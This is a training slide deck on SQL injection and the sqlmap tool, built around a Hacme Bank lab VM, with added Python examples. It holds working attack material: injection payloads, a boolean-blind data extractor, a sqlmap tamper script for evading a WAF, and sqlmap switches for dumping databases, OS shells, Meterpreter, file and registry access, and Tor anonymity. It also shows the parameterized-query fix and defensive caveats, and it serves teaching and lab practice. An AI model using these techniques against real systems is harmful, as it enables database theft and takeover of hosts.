SQL INJECTION
One Click 0wnage using SQL Map


By: Taufiq Ali
LAB SETUP

- VM with Hacme Bank installed
    http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/
- On Windows: the latest version of Python
- SQLMap for Windows
    https://github.com/sqlmapproject/sqlmap/zipball/master
- SQLMap for *nix
    It ships with BackTrack 5 (BT5)
OWASP TOP 10

A1 : Injection
- Injection flaws, such as SQL, OS, and LDAP injection,
  occur when untrusted data is sent to an interpreter as
  part of a command or query. The attacker’s hostile data
  can trick the interpreter into executing unintended
  commands or accessing unauthorized data.
INJECTIONS

- Common types of injection:
    SQL
    LDAP
    XPath
    etc.

- Impact
    As disastrous as handing the database over to the attacker
    Can also lead to OS-level access (command execution on the database host)
DEFINITION

- Exploiting poorly filtered or incorrectly escaped SQL queries so that
  user input is parsed (executed) as part of the query instead of being
  treated as data
- Major classes
    Error-based
    Blind (boolean-based and time-based)
    UNION-based
    etc.
HOW DOES IT WORK?

- Application presents a form to the attacker
- Attacker sends an attack in the form data
- Application forwards the attack to the database inside a SQL query
- Database runs the query containing the attack and returns the result
  to the application (the attacker's SQL ran with the application's
  database privileges)
- Application renders the data to the user
VULNERABLE CODE
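The slide under this heading was an image that did not survive extraction. As an added illustration that is not from the original deck, the following Python snippet puts a string-concatenated login query next to its parameterized fix and runs both against an in-memory SQLite table. The users table, its single row and the two payloads are constructed for the demo.

```python
"""Vulnerable vs. parameterized login query, run against an in-memory
SQLite table. Added example; not from the original deck. The users table,
its single row and the payloads are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")  # constructed
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The bug: user input is spliced into the SQL text, so quotes and
    comment markers in the input are parsed as SQL, not treated as data."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: a parameterized query. The statement text is fixed and the
    driver binds the values separately, so the same payloads stay literal."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Two classic payloads. The first turns the WHERE clause into
#   username = 'x' AND password = '' OR '1'='1'   (always true);
# the second closes the username string and comments out the rest
# ("--" starts a SQL comment), so the password is never checked.
PAYLOADS = {
    "always_true": ("x", "' OR '1'='1"),
    "comment_out": ("admin'-- ", "wrong"),
}


def run_demo() -> dict:
    """Try valid credentials and both payloads against both versions."""
    conn = make_db()
    results = {
        "vulnerable_valid": login_vulnerable(conn, "admin", "S3cret!"),
        "safe_valid": login_safe(conn, "admin", "S3cret!"),
    }
    for name, (user, pw) in PAYLOADS.items():
        results["vulnerable_" + name] = login_vulnerable(conn, user, pw)
        results["safe_" + name] = login_safe(conn, user, pw)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-24s %s" % (key, "LOGGED IN" if value else "rejected"))
```

The parameterized version still accepts the real credentials, and rejects both payloads because the driver never lets the input change the statement's structure. Escaping alone is weaker: it has to be correct for every DBMS quirk, whereas binding side-steps the parser entirely.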
SQL MAP
0wnage 0wnage 0wnage..
SQL MAP INTRODUCTION
- Powerful command-line utility to detect and exploit SQL injection
  vulnerabilities
- Supported databases (as listed in this deck; later releases added more):
    MySQL
    Oracle
    PostgreSQL
    Microsoft SQL Server
    Microsoft Access
    IBM DB2
    SQLite
    Firebird
    Sybase
    SAP MaxDB
SQL INJECTION TECHNIQUES

- Boolean-based blind
- Time-based blind
- Error-based
- UNION query
- Stacked queries
- Out-of-band
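To make the boolean-based blind technique concrete, here is an added Python example (not from the original deck, and not sqlmap's code) that recovers a string the page never displays, one character at a time, by asking a page that only reveals "row found" or "no row". The users table and its row are constructed for the demo; the binary search over each character's code point is the same trick sqlmap uses to keep the request count down, and the same oracle could be driven by a sleep() delay instead for the time-based variant.

```python
"""Boolean-based blind SQL injection, worked by hand: the attacker never
sees query output, only whether the page showed a row, and still recovers
the data. Added example; not from the original deck or from sqlmap.
The table and its row are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")  # constructed
    conn.commit()
    return conn


def vulnerable_page(conn: sqlite3.Connection, user_id: str) -> bool:
    """Stand-in for a profile page: True if the query returned a row.
    The id parameter is concatenated into the SQL unescaped (the bug),
    and nothing else about the query result reaches the attacker."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchone() is not None


def extract_blind(conn: sqlite3.Connection, subquery: str, max_len: int = 64):
    """Recover the string produced by `subquery` using only yes/no answers.
    Returns (value, number_of_requests)."""
    requests = 0

    def ask(condition: str) -> bool:
        # Inject "AND (<condition>)": the row is shown only if it holds.
        nonlocal requests
        requests += 1
        return vulnerable_page(conn, "1 AND (" + condition + ")")

    # Step 1: learn the length so the loop knows where to stop.
    length = 0
    for n in range(max_len + 1):
        if ask("length((%s)) = %d" % (subquery, n)):
            length = n
            break

    # Step 2: for each position, binary-search the character's code point
    # over printable ASCII (32..126): about 7 requests instead of up to 95.
    value = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    db = make_db()
    secret, n = extract_blind(db, "SELECT password FROM users WHERE username = 'admin'")
    print("%s recovered in %d requests" % (secret, n))
```

The seven-character secret comes back in well under sixty requests. That request volume, and the telltale `AND (unicode(substr(...` pattern, is also what a defender should expect to see in the web logs when sqlmap runs this technique.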
KEY SQL MAP SWITCHES
- -u <URL> (target URL, including the injectable parameter)
- --cookie (send a session cookie so authenticated pages can be tested)
- --dbs (enumerate databases)
- -r <file> (load a raw HTTP request saved in a .txt file, e.g. from a proxy)
- --technique (restrict to given SQL injection techniques: B boolean-blind,
  T time-blind, E error-based, U UNION, S stacked queries)
- --dbms (specify the back-end DBMS and skip fingerprinting)
- -D <database name> --tables (list tables)
- -T <table name> --columns (list columns)
- -C <column name> --dump (dump the column's rows)
- --dump-all (dump every database; for lazy l33t people)
SQL MAP FLOW

- Enumerate the database names (--dbs)
- Select a database and enumerate its tables (-D ... --tables)
- Select a table and enumerate its columns (-T ... --columns)
- Select columns and dump the rows (data) (-C ... --dump)
- Then choose your way in
WHY 0WNING THE ENTERPRISE?

- Built-in capability to crack dumped password hashes (dictionary-based)
- Option to run user-defined SQL queries
- You can run OS-level commands
- You can get an interactive OS shell
- Meterpreter shell via Metasploit
OPTIONS FOR 0WNING THE ENTERPRISE

- --os-cmd
    Run any OS-level command

- --os-shell
    Starts an interactive shell

- --os-pwn
    Gets an out-of-band shell (Meterpreter or VNC) through Metasploit

- --tamper
    Evading a WAF by rewriting payloads before they are sent
SQL MAP ++
- --tor: Use the Tor anonymity network
- --tor-port: Set a Tor proxy port other than the default
- --tor-type: Set the Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)
- --check-payload: Offline WAF/IPS/IDS payload detection testing
- --check-waf: Check for existence of WAF/IPS/IDS protection
- --gpage: Use Google dork results from the specified page number
- --mobile: Imitate a smartphone through the HTTP User-Agent header
- --smart: Conduct thorough tests only if positive heuristic(s)
- --tamper: custom scripts that rewrite payloads
SQL MAP ++ - FILE SYSTEM ACCESS

- These options can be used to access the file system underlying the
  back-end database management system
- --file-read=RFILE: Read a file from the back-end DBMS file system
- --file-write=WFILE: Write a local file to the back-end DBMS file system
- --file-dest=DFILE: Back-end DBMS absolute file path to write to (used
  together with --file-write)
- Caveat: this only works when the database account holds the required
  privilege (e.g. the FILE privilege on MySQL) and the DBMS process can
  reach the path; a hardened server restricts both
SQL MAP ++ - OPERATING SYSTEM ACCESS

- These options can be used to access the operating system underlying the
  back-end database management system
    --os-cmd=OSCMD - Execute an operating system command
    --os-shell - Prompt for an interactive operating system shell
    --os-pwn - Prompt for an out-of-band shell, Meterpreter or VNC
    --os-smbrelay - One-click prompt for an OOB shell, Meterpreter or VNC
    --os-bof - Stored procedure buffer overflow exploitation
    --priv-esc - Database process' user privilege escalation
    --msf-path=MSFPATH - Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH - Remote absolute path of the temporary files directory
- Caveat: OS takeover needs a highly privileged database account (e.g.
  sysadmin on Microsoft SQL Server for xp_cmdshell, or file-write rights
  on MySQL/PostgreSQL to upload a UDF library); an application that
  connects with a least-privilege account does not give this up
SQLMAP ++ - WINDOWS REGISTRY ACCESS

- These options can be used to access the Windows registry of the host
  running the back-end database management system
- --reg-read - Read a Windows registry key value
- --reg-add - Write a Windows registry key value data
- --reg-del - Delete a Windows registry key value
- --reg-key=REGKEY - Windows registry key
- --reg-value=REGVAL - Windows registry key value
- --reg-data=REGDATA - Windows registry key value data
- --reg-type=REGTYPE - Windows registry key value type
TAMPER SCRIPTS – BYPASSING WAF

- Located inside the tamper folder in SQLMap
- space2hash.py and space2morehash.py (MySQL: spaces become a "#comment" plus newline)
- space2mssqlblank.py (MSSQL) and space2mysqlblank.py (MySQL): spaces become
  other blank characters the DBMS accepts
- charencode.py and chardoubleencode.py (URL encoding and double URL encoding)
- charunicodeencode.py and percentage.py (to hide the payload against
  ASP/ASP.NET applications)
- Caveat: these defeat signature rules that match the literal payload; a WAF
  that decodes and normalizes the request before matching sees through them
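What a tamper script actually looks like, as an added example that is not one of sqlmap's bundled scripts: sqlmap imports the file given to --tamper and calls its tamper(payload, **kwargs) function on each payload before sending it. This one replaces spaces outside string literals with inline comments and randomizes keyword case, combining the ideas of space2comment.py and randomcase.py. The NAIVE_WAF rule and normalize() function are constructed for the demo to show what the transform does and does not beat.

```python
"""Example sqlmap tamper script (added here; not one of sqlmap's bundled
scripts). sqlmap imports the file given to --tamper and calls
tamper(payload, **kwargs) on each payload before it is sent. This one
replaces spaces outside string literals with inline comments (/**/) and
randomizes keyword case. The NAIVE_WAF rule and normalize() are
constructed for the demo."""
import random
import re

# sqlmap's bundled scripts also set a load priority with
#   from lib.core.enums import PRIORITY; __priority__ = PRIORITY.LOW
# That import only resolves inside the sqlmap tree, so it is left out so
# the file runs stand-alone (sqlmap treats the priority as optional).

KEYWORD_RE = re.compile(r"\b(?:SELECT|UNION|AND|OR|FROM|WHERE)\b", re.IGNORECASE)


def dependencies():
    """Called by sqlmap at load time; bundled scripts print DBMS caveats here."""
    pass


def _mix_case(text: str) -> str:
    return "".join(random.choice((c.lower(), c.upper())) for c in text)


def tamper(payload, **kwargs):
    """Transform one payload. String literals are copied untouched: turning
    'a b' into 'a/**/b' would change the value the query compares against."""
    if not payload:
        return payload
    out, buf, quote = [], [], None

    def flush():
        # Rewrite the accumulated non-quoted segment, then reset it.
        seg = "".join(buf).replace(" ", "/**/")
        seg = KEYWORD_RE.sub(lambda m: _mix_case(m.group(0)), seg)
        out.append(seg)
        buf.clear()

    for ch in payload:
        if quote:                      # inside a literal: copy verbatim
            out.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):         # a literal starts
            flush()
            quote = ch
            out.append(ch)
        else:
            buf.append(ch)
    flush()
    return "".join(out)


# A toy signature rule, constructed for the demo: literal whitespace and
# upper-case keywords, the kind of pattern this tamper is written for.
NAIVE_WAF = re.compile(r"\bUNION\s+SELECT\b")


def blocked(payload: str) -> bool:
    return NAIVE_WAF.search(payload) is not None


def normalize(payload: str) -> str:
    """What a better WAF does before matching: drop inline comments and
    fold case. Against that, this tamper buys nothing."""
    return re.sub(r"/\*.*?\*/", " ", payload).upper()


if __name__ == "__main__":
    original = "1 UNION SELECT username, 'a b' FROM users"
    evasive = tamper(original)
    print(evasive)
    print("blocked raw: %s, tampered: %s, normalized: %s" % (
        blocked(original), blocked(evasive), blocked(normalize(evasive))))
```

Save it as a .py file and pass its path to --tamper. The quote tracking is the part worth copying: a script that blindly replaces every space corrupts the string literals sqlmap uses in its own payloads and silently turns true conditions into false ones.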
WHAT YOU SHOULD EXPLORE

- One Click Ownage with SQL Injection
  www.mavitunasecurity.com/s/research/OneClickOwnage.pdf

- SQL Map with TOR
  http://0entropy.blogspot.in/2011/04/sqlmap-and-tor.html

- SQL MAP Usage Guide
  http://sqlmap.sourceforge.net/doc/README.html
One click 0wnage

THANK YOU!